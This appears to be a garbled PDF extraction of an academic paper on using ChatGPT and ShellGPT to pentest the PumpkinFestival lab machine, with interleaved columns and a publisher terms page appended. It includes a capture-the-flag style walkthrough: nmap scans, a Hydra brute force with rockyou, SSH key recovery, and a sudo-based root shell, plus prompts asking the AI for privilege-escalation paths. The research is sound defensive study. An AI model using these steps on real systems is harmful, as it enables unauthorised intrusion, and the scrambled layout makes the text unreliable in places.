Upon logging in using the password, the fourth token was sgpt --shell "what filetype
immediately found under the Profile page (/wp-admin/ is data.txt"
profile.php).
Terminal Output:
Step 19 - Logging in to FTP using rockyou.
file data.txt
Objective: Use the rockyou password list, a list of over 14 Explanation: Two tokens were found by traversing the FTP
million plaintext passwords from a 2009 database leak, to folders and a mysterious third file named data.txt was
Terminal Input for GenAI: also exfiltrated.
Step 20 - Login to FTP using the found credentials. Step 23 - Inception extraction of data.
Objective: Utilise previously discovered credentials to log Objective: Conduct further extraction to discover data
into an FTP server to gain initial access or discover further embedded within the archive.
information about the target system. Terminal Input for GenAI:
Step 21 - Fifth and sixth token plus a mystery file. Step 24 - Inside the key tar archive is jack.
123
Explanation: A file within the archive named key was found sgpt --shell "under elevated
to be another POSIX tar archive which was then extracted. privilege, change permission
It revealed a file named jack which contained 10,106 lines of ˜/.ssh/id_rsa from read-only
of ASCII text that appeared to be hex values. to read and write for the owner"
Explanation: The final part of this step is to move the sgpt --chat pentest "after
OpenSSH private key file into its appropriate location. This logging into ssh as a standard
is a critical step for gaining authorised access to the target user, suggest pathways towards
system. privilege escalation"
123
123
By finding the local machine’s IP address in Step 1, initial ChatGPT highlighted the utility and depth of its knowledge-
connectivity information is established—a crucial part of the base and helped deliver a successful active reconnaissance
planning and reconnaissance stage of the pentesting process. phase.
Although passive reconnaissance was not utilised during the While not applicable to the experimentation conducted
experimentation phase, in a real-world pentesting scenario, in Sect. 4.2 Experimentation, ChatGPT can be used to
ChatGPT can be used to gather publicly available information generate a detailed report of the initial findings from the
about the target. These applications include: reconnaissance phase, which can be used in the subsequent
phases of the penetration test. As seen in “Appendix A”, the
– Searching the web for information related to the tar- report include a summary of the target’s profile, identified
get organisation, such as its domain name, IP addresses, vulnerabilities, potential attack vectors, and recommenda-
employee names, and email addresses. tions for further investigation. This was not applicable to the
– Analysing social media profiles of key personnel within experimentation conducted, however.
the target organisation to identify potential security weak
points. 5.2 Scanning
– Reviewing public databases, like WHOIS records, to
extract valuable information about the target’s domain In the scanning phase, ChatGPT can be used to aid in
and IP addresses. performing detailed scans of the target particularly their
– Identifying the technologies used by the target, includ- network, systems and applications to identify open ports,
ing server and client-side software, by examining their services, and potential vulnerabilities. By leveraging its nat-
public-facing web applications or analysing job postings. ural language processing (NLP) capabilities and integration
with common or publicly available scanning tools, ChatGPT
In a paper discussing ChatGPT and reconnaissance [42], can assist in interpreting the scan output.
prompts were created to extract information from ChatGPT Scanning is best exhibited from Step 11 through to Step 14
−3.5 although the exact prompts and results were not made which started with a vulnerability scan being conducted on
available. the Wordpress site using wpscan as well as a gobuster
scan also performed using a medium wordlist to enumerate
Active reconnaissance directories and files. Step 2 and Step 3 is also applicable to
this phase of the process as the network is probed and open
Although directly using ChatGPT to interact with the target’s services and ports were discovered.
systems and networks to gather more detailed information is
not possible mainly due to its policies and also the resulting Define parameters
information may be outdated, it can however be used in the
following manner: At the start of the conversation, the necessary parameters
can be provided to ChatGPT in a variable-style format
– Crafting and sending custom DNS queries to identify which it can then "remember" or store in its memory for
subdomains, IP addresses, and mail servers associated the duration of the conversation. For example, the variable
with the target. [target] can be allocated with the target’s IP addresses,
– Using ChatGPT’s natural language processing capabil- [hostname] for the device’s NetBIOS name, or [FQDN]
ities to analyse responses from network services like for the fully qualified domain name of the target (see Fig. 2).
SMTP, FTP, and HTTP, and extract useful information These parameters can be based on the information gathered
about the target’s infrastructure. during the Reconnaissance phase.
– Instructing ChatGPT to generate network scans using
tools like Nmap, Nessus or OpenVAS to identify open 5.2.1 Execution
ports, services, and operating systems on the target’s net-
work. As demonstrated in Fig. 2, ChatGPT can then generate the
commands using the defined parameters to perform various
Step 6 to Step 9 demonstrate these capabilities. From inspec- scans such as:
tion of the webpage’s source code, uncovering the usernames,
discovering URLs and up to identifying the relevant domain, – Network scans with Nmap:
123
123
This phase of the pentesting process relies more on the 5.5.1 Automated report generation
analysis of the results from reconnaissance and scanning.
Creativity is almost a requirement in finding out the inherent The generation of the Penetration Testing Report in
vulnerabilities based on the combination of these results. In “Appendix A” relied on the key strength of LLMs—the ability
this regard, ChatGPT can be seen to provide guidance and to generate human-like text based on the input given. In this
recommendations on the use of certain tools and techniques. case, the prompts and responses and the entire body of results
Its competence in deduction and interpretation of the results as output from its suggested commands. It was able to sum-
are also useful. Due to this, it is able to prioritise the vulnera- marise concisely the steps to root the machine and presents
bilities by order of most significant risk or by easiest to crack. this in the Test Methodology and Detailed Findings sections
It is also able to digest an inordinate amount of text such as of the report. Its Recommendations were also accurate. Cou-
logs in a fraction of time compared to manual techniques or pled with other tools, such as visualisation software, it can
even using semi-automated tools to summarise the output. potentially generate other forms of data representation to be
included in the report and help make it more understandable
or actionable for the client.
5.4 Exploitation
5.5.2 Customisation and quality
While ChatGPT proved to be an excellent genAI tool for
The reporting format can vary widely for every target and for
pentesting for the previous phases, it shone the greatest in
every client. ChatGPT could be used to customise the report
exploiting the vulnerabilities of the remote machine. The
based on the specifications of the client, the nature and the
various steps that exploited the vulnerabilities discovered are
findings of the test. Quality-wise it can produce an accurate,
listed below:
complete and polished report based on ChatGPT’s ability to
check for errors, inconsistencies and identify areas that need
clarification.
Step 4 - anonymous FTP login
Step 5 - accessing the contents of token.txt
Step 15 - retrieval of a token from a discovered file 6 Conclusion
Step 17 - a coded message was deciphered to yield a
password GenAI and LLMs have the potential to revolutionise pentest-
Step 18 - logging in and retrieving another token ing, offering numerous benefits such as improved efficiency,
Step 19 - using the rockyou password list to crack the enhanced creativity, customised testing environments, and
FTP login continuous learning and adaptation. However, applications
Step 20 - utilising the discovered credentials to login to in this domain is double-edged presenting novel challenges
the FTP server and limitations, such as overreliance on AI, potential model
bias or fairness issues notwithstanding the ethical and legal
concerns,
Moreover, the use of GenAI in pentesting can lead to
Exploit selection. In Step 28 ChatGPT was able to identify potential risks and unintended consequences, including its
and suggest potential exploits that were most appropriate use in generating polymorphic malware, escalation of cyber
given the chat history and by doing so, takes full advantage threats, advanced persistent threats, and uncontrolled AI
of the earlier identified vulnerabilities. development.
Customised exploits. In the case of decoding a string into To address these concerns, organisations must adopt best
base 62 as shown in Step 17, the python script it created practices and guidelines, focusing on responsible AI deploy-
in a matter of seconds was simple yet completely effective. ment, data security and privacy, and fostering collaboration
That is all that matters. A tool that does the job. And almost and information sharing. Governments should strike a bal-
instantaneous at that. ance between limiting its negative applications while not
Step 29 represented the culmination of the exploitation hindering its potential.
phase as ChatGPT crafted the final exploit based on the pre- In conclusion, it does offer promising opportunities for
viously identified pathways ultimately resulting in privilege enhancing the effectiveness of pentesting and ultimately
escalation. improving the cyber security posture of organisations.
123
While the experimentation was successful in completing intended use is not permitted by statutory regulation or exceeds the
its objective of fully compromising the remote machine, it permitted use, you will need to obtain permission directly from the copy-
right holder. To view a copy of this licence, visit http://creativecomm
is essential for stakeholders to carefully consider potential ons.org/licenses/by/4.0/.
challenges, risks, and unintended consequences associated
with its use.
The key is to adopt responsible practices to ensure that the
benefits of the technology are realised while minimising the Appendix A: Penetration testing report
potential downsides. By doing so, organisations can leverage
the power of GenAI to better protect themselves against the Appendix A.1: Executive summary
ever-evolving threat landscape and maintain a secure digital
environment for all. The penetration test was conducted on a virtual machine
called "PumpkinFestival". The objective of the test was to
identify vulnerabilities and exploit them to gain unauthorized
access to the system. The test was successful in achiev-
7 Future works ing its objective. The vulnerabilities identified and exploited
included an anonymous FTP login, a WordPress site with
Future works identified to have the potential to advance the
multiple users, and a misconfigured sudo rights for a user.
research and experiment conducted in this paper and the field
of GenAI and pentesting in general are briefly discussed in
this section. Appendix A.2: Test methodology
Auto-GPT [40] is an open-source and Python-based tool
that makes GPT-4 completely autonomous using subpro- 1. Initial Reconnaissance The initial scan was conducted
cesses of GPT-4 to break down and achieve the objective using Nmap, which revealed FTP on port 21 allowing
a user sets. It has the most potential in advancing research anonymous login. The first PumpkinToken was found on
in this field when theoretically, a singular prompt to "pen- the FTP server.
test a target machine" is all that is required. The project 2. HTTP and FTP Exploration The HTTP website was
was released only about two weeks after OpenAI’s GPT-4 explored, revealing another PumpkinToken hidden in the
release on 14th March 2023. It quickly became the top trend- source code. The /tokens/ and /users/ directories were
ing repository on GitHub shortly after. Although it currently forbidden, and the /wordpress/ directory returned a 404
suffers from issues such as "hallucinations", many users con- error. A note was found in /store/track.txt, hinting at
tinue to find uses for the project. a local domain (pumpkins.local) and an email address
In addressing concerns regarding privacy and confiden- ([email protected]).
tiality, integrating sgpt with privateGPT [20], a tool that 3. Domain Manipulation and WordPress Scanning The
uses GPT for private interaction with documents is one real- /etc/hosts file was edited to include the line "192.168.1.109
istic body of work identified. pumpkins.local", which allowed access to a WordPress
Funding Open Access funding enabled and organized by CAUL and
site when visiting pumpkins.local. Another PumpkinTo-
its Member Institutions ken was found on this site. A WordPress scan revealed two
users and several vulnerabilities, but all required authen-
Data Availibility We do not analyse or generate any data-sets, because tication or were not useful.
our work proceeds within a virtual machine environment. One can
obtain the relevant materials from the reference [21].
4. FTP Revisited and Bruteforce Attack A hint from the
author suggested revisiting the FTP. The name "Harry"
Declarations was found in the initial note, and a bruteforce attack using
Hydra revealed the password for the user "Harry". This
Conflict of interest The authors declare that there are no conflicts of led to another directory named "Donotopen", containing
interest. another PumpkinToken and a file named data.txt.
5. Binary File and Private Key Extraction The data.txt file
Open Access This article is licensed under a Creative Commons
Attribution 4.0 International License, which permits use, sharing, adap-
contained binary data, which turned out to be a tar file.
tation, distribution and reproduction in any medium or format, as This file contained a file named "jack", which was a hex-
long as you give appropriate credit to the original author(s) and the encoded private key for the user "Jack". This allowed SSH
source, provide a link to the Creative Commons licence, and indi- login into Jack’s account.
cate if changes were made. The images or other third party material
in this article are included in the article’s Creative Commons licence,
6. Further Enumeration and Token Extraction Running an
unless indicated otherwise in a credit line to the material. If material enumeration script revealed some user and SUIDs. Run-
is not included in the article’s Creative Commons licence and your ning the token SUID printed out another PumpkinToken.
123
7. HTTP Revisited and Directory Enumeration HTTP was The scan revealed two users, admin and morse. A
revisited with directory enumeration using Gobuster. A gobuster scan was also conducted to further enumer-
readme.html file was found containing a base62 encoded ate the WordPress site.
string, which decoded to a password for the users "morse" 5. SSH Exploitation A file named jack was identified to
and "jack". contain hex values, which were decoded to reveal an
8. WordPress Login and Privilege Escalation The password OpenSSH private key. The key was used to login to the
was used to log into the WordPress dashboard. Although SSH server on port 6880 as the user jack. The user’s
there was no theme editor, the password was used to privileges were listed using sudo -l.
check Jack’s sudo rights. Jack was able to run a non- 6. Privilege Escalation The user jack was found to have
existent file /home/jack/pumpkin/alohomora, sudo rights to run
which was created with a bash shell script. Running this
file as sudo gave root access. /home/jack/pumpkin/alohomora
Appendix A.3: Detailed findings Since this file did not exist, it was created with a shell
script and run with sudo to gain a root shell.
1. Network Scanning The local machine’s IP address was
identified using the command Appendix A.4: Recommendations
ip addr show | grep "inet " | The identified vulnerabilities should be addressed to improve
awk `{print $2}' | cut the security posture of the system. Specifically:
-d `/' -f1
1. Strengthen password policies to prevent brute force
The network was probed using the command attacks.
2. Disable anonymous FTP login to prevent unauthorised
nmap -sn 10.0.2.0/24 access to files.
3. Regularly update the WordPress site and its plugins to
and the remote machine was scanned using patch known vulnerabilities.
4. Implement proper input validation to prevent hidden
injection attacks.
nmap -A -p- 10.0.2.15
5. Restrict sudo rights to only necessary commands for each
user.
2. FTP Exploitation An FTP service running on the remote 6. Regularly review and update user privileges, and correct
machine allowed for anonymous login. The command file and directory permissions.
123
International Scientific Conference On Information Technology 19. Hern, A., Milmo, D.: AI chatbots making it harder to spot
and Data Related Research. pp. 229–234 (2019) phishing emails, say experts. The Guardian. (2023) https://www.
3. Aggarwal, G.: Harnessing GenAI: Building Cyber Resilience theguardian.com/technology/2023/mar/29/ai-chatbots-making-
Against Offensive AI. Forbes. (2023) https://www.forbes.com/ it-harder-to-spot-phishing-emails-say-experts
sites/forbestechcouncil/2023/09/25/harnessing-genai-building- 20. Imartinez privateGPT. https://github.com/imartinez/privateGPT
cyber-resilience-against-offensive-ai/?sh=775c8fa08ed0 (2023) Accessed 4 Jun 2023
4. AttackIQ AttackIQ Ready!. https://www.attackiq.com/platform/ 21. Jayanth Mission-Pumpkin v1.0: PumpkinFestival. https://www.
attackiq-ready (2023) Accessed 2 May 2023 vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/
5. Avgerinos, T., Brumley, D., Davis, J., Goulden, R., Nighswander, (2019) Accessed 4 May 2023
T., Rebert, A., Williamson, N.: The Mayhem cyber reasoning sys- 22. Khan, S., Kabanov, I., Hua, Y., Madnick, S.: A systematic analysis
tem. IEEE Secur. Priv. 16, 52–60 (2018). https://doi.org/10.1109/ of the capital one data breach: critical lessons learned. ACM Trans.
msp.2018.1870873 Priv. Secur. (2022). https://doi.org/10.1145/3546068
6. Ben-Moshe, S., Gekker, G., Cohen, G.: OpwnAI: AI That Can Save 23. Mansfield-Devine, S.: Weaponising ChatGPT. Netw. Secur. (2023)
the Day or HACK it Away—Check Point Research. Check Point 24. McDaniel, L., Talvi, E., Hay, B.: Capture the flag as cyber security
Research (2023) https://research.checkpoint.com/2022/opwnai- introduction. In: 2016 49th Hawaii International Conference On
ai-that-can-save-the-day-or-hack-it-away System Sciences (HICSS), pp. 5479–5486 (2016)
7. BlackBerry Ltd ChatGPT May Already Be Used in Nation 25. Microsoft Microsoft and OpenAI extend partner-
State Cyberattacks, Say IT Decision Makers in BlackBerry ship. https://blogs.microsoft.com/blog/2023/01/23/
Global Research. https://www.blackberry.com/us/en/company/ microsoftandopenaiextendpartnership (2023) Accessed 4 May
newsroom/press-releases/2023/chatgpt-may-already-be-used-in- 2023
nation-state-cyberattacks-say-it-decision-makers-in-blackberry- 26. Montalbano, E.: ChatGPT Hallucinations Open Developers to Sup-
global-research (2023) Accessed 4 May 2023 ply Chain Malware Attacks. Dark Reading. (2023) https://www.
8. Chen, J., Hu, S., Zheng, H., Xing, C., Zhang, G.: GAIL-PT: an darkreading.com/application-security/chatgpt-hallucinations-
intelligent penetration testing framework with generative adver- developers-supply-chain-malware-attacks
sarial imitation learning. Comput. Secur. 126, 103055 (2023) 27. Morpheuslord GPT_Vuln-analyzer. https://github.com/
9. Cunningham, A.: Microsoft could offer private ChatGPT morpheuslord/GPT_Vuln-analyzer (2023) Accessed 4 May
to businesses for “10 times” the normal cost. Ars Technica 2023
https://arstechnica.com/information-technology/2023/05/report- 28. Offensive Security Get Kali | Kali Linux. https://www.kali.org/get-
microsoft-plans-privacy-first-chatgpt-for-businesses-with- kali/#kali-virtual-machines (2023) Accessed 4 Jun 2023
secrets-to-keep (2023) Accessed 4 May 2023 29. OpenAI ChatGPT - Release Notes. https://help.openai.com/en/
10. CyCraft Technology Corp CyCraft’s Fuchikoma at Code Blue articles/6825453-chatgpt-release-notes (2023) Accessed 14 Oct
2019: The Modern-Day Ghost in the Shell - CyCraft. https:// 2023
cycraft.com/cycrafts-fuchikoma-at-code-blue-2019-the-modern- 30. OpenAI OpenAI and Microsoft extend partnership. https://openai.
day-ghost-in-the-shell (2019) Accessed 2 May 2023 com/blog/openai-and-microsoft-extend-partnership (2023)
11. CyCraft Technology Corp How to Train a Machine Learn- Accessed 4 May 2023
ing Model to Defeat APT Cyber Attacks, Part 2: Fuchikoma 31. OpenAI Usage policies. https://openai.com/policies/usage-
VS CyAPTEmu—The Weigh-In. (2020) https://medium. policies (2023) Accessed 4 May 2023
com/@cycraft_corp/how-to-train-a-machine-learning-model- 32. Papernot, N., McDaniel, P., Goodfellow, I., Jha, S., Celik, Z.,
to-defeat-apt-cyber-attacks-part-2-fuchikoma-vs-cyaptemu- Swami, A.: Practical black-box attacks against machine learning.
f689a5df5541 In: Proceedings Of The 2017 ACM On Asia Conference on Com-
12. Deng, G.: PentestGPT. (2023) https://github.com/GreyDGL/ puter and Communications Security, pp. 506–519 (2017)
PentestGPT 33. Petro, D., Morris, B.: Weaponizing machine learning: Humanity
13. Europol The criminal use of ChatGPT—a cautionary tale was overrated anyway. DEF CON, vol 25 (2017)
about large language models | Europol. https://www.europol. 34. Prasad, S., Sharmila, V., Badrinarayanan, M. Role of Artificial
europa.eu/media-press/newsroom/news/criminal-use-of-chatgpt- Intelligence based Chat Generative Pre-trained Transformer (Chat-
cautionary-tale-about-large-language-models (2023) Accessed 4 GPT) in Cyber Security. In: 2023 2nd International Conference on
May 2023 Applied Artificial Intelligence and Computing (ICAAIC), pp. 107–
14. Gal, U.: ChatGPT is a data privacy nightmare. https:// 114 (2023)
theconversation.com/chatgpt-is-a-data-privacy-nightmare-if- 35. Renaud, K., Warkentin, M., Westerman, G.: From ChatGPT to
youve-ever-posted-online-you-ought-to-be-concerned-199283 HackGPT: Meeting the Cybersecurity Threat of Generative AI.
(2023) Accessed 4 May 2023 MIT Sloan Management Review (2023)
15. Grbic, D., Dujlovic, I.: Social engineering with ChatGPT. In: 22nd 36. Sanjaya, I., Sasmita, G., Arsa, D.: Information technology risk
International Symposium INFOTEH-JAHORINA (INFOTEH), management using ISO 31000 based on ISSAF framework pen-
pp. 1–5 (2023) etration testing (Case Study: Election Commission of X City). Int.
16. Greshake, K., Abdelnabi, S., Mishra, S., Endres, C., Holz, T., J. Comput. Netw. Inf. Secur. 12 (2020)
Fritz, M.: More than you’ve asked for: A Comprehensive Anal- 37. Scherb, C., Heitz, L., Grimberg, F., Grieder, H., Maurer, M.: A
ysis of Novel Prompt Injection Threats to Application-Integrated serious game for simulating cyberattacks to teach cybersecurity.
Large Language Models. (2023). https://ui.adsabs.harvard.edu/ ArXiv:2305.03062. (2023)
abs/2023arXiv230212173G 38. Shimony, E., Tsarfati, O.: Chatting Our Way Into Creating a Poly-
17. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From Chat- morphic Malware. https://www.cyberark.com/resources/threat-
GPT to ThreatGPT: Impact of generative AI in cybersecurity and research-blog/chatting-our-way-into-creating-a-polymorphic-
privacy. IEEE Access. (2023) malware (2023) Accessed 4 May 2023
18. Gurman, M.: Samsung Bans Staff’s AI Use After Spotting Chat- 39. Siemens Energy DeepArmor®Industrial. https://assets.siemens-
GPT Data Leak. Bloomberg. (2023) https://www.bloomberg.com/ energy.com/siemens/assets/api/uuid:48023aeb-6592-46ae-
news/articles/2023-05-02/samsung-bans-chatgpt-and-other- bf7c-0353c0653fe6/siemensenergycybersecuritybrochure-
generative-ai-use-by-staff-after-leak#xj4y7vzkg
123
deeparmour-industrial210429.pdf (2023) Accessed 2 May 44. Zacharakos, A.: How hackers can abuse ChatGPT to create mal-
2023 ware. Security. (2023) https://www.techtarget.com/searchsecurity/
40. Significant-Gravitas Auto-GPT. https://github.com/Significant- news/365531559/How-hackers-can-abuse-ChatGPT-to-create-
Gravitas/Auto-GPT (2023)Accessed 4 Jun 2023 malware
41. Takaesu, I.: Deepexploit: Fully automatic penetration test tool 45. Zhuo, T., Huang, Y., Chen, C., Xing, Z.: Exploring ai ethics of
using machine learning. BlackHat (2018) chatgpt: a diagnostic analysis. ArXiv:2301.12867. (2023)
42. Temara, S.: Maximizing Penetration Testing Success with Effec-
tive Reconnaissance Techniques using ChatGPT. Research Square
Platform LLC https://doi.org/10.21203/rs.3.rs-2707376/v1 (2023)
Publisher’s Note Springer Nature remains neutral with regard to juris-
Accessed 4 Jun 2023
dictional claims in published maps and institutional affiliations.
43. TheR1D ShellGPT. https://github.com/TheR1D/shell_gpt (2023)
Accessed 4 May 2023
123
1. use such content for the purpose of providing other users with access on a regular or large scale basis or as a means to circumvent access
control;
2. use such content where to do so would be considered a criminal or statutory offence in any jurisdiction, or gives rise to civil liability, or is
otherwise unlawful;
3. falsely or misleadingly imply or suggest endorsement, approval , sponsorship, or association unless explicitly agreed to by Springer Nature in
writing;
4. use bots or other automated methods to access the content or redirect messages
5. override any security feature or exclusionary protocol; or
6. share the content in order to create substitute for Springer Nature products or services or a systematic database of Springer Nature journal
content.
In line with the restriction against commercial use, Springer Nature does not permit the creation of a product or service that creates revenue,
royalties, rent or income from our content or its inclusion as part of a paid for service or for other commercial gain. Springer Nature journal
content cannot be used for inter-library loans and librarians may not upload Springer Nature journal content on a large scale into their, or any
other, institutional repository.
These terms of use are reviewed regularly and may be amended at any time. Springer Nature is not obligated to publish any information or
content on this website and may remove it or features or functionality at our sole discretion, at any time with or without notice. Springer Nature
may revoke this licence to you at any time and remove access to any copies of the Springer Nature journal content which have been saved.
To the fullest extent permitted by law, Springer Nature makes no warranties, representations or guarantees to Users, either express or implied
with respect to the Springer nature journal content and all parties disclaim and waive any implied warranties or warranties imposed by law,
including merchantability or fitness for any particular purpose.
Please note that these rights do not automatically extend to content, data or other material published by Springer Nature that may be licensed
from third parties.
If you would like to use or distribute our Springer Nature journal content to a wider audience or on a regular basis or in any other manner not
expressly permitted by these Terms, please contact Springer Nature at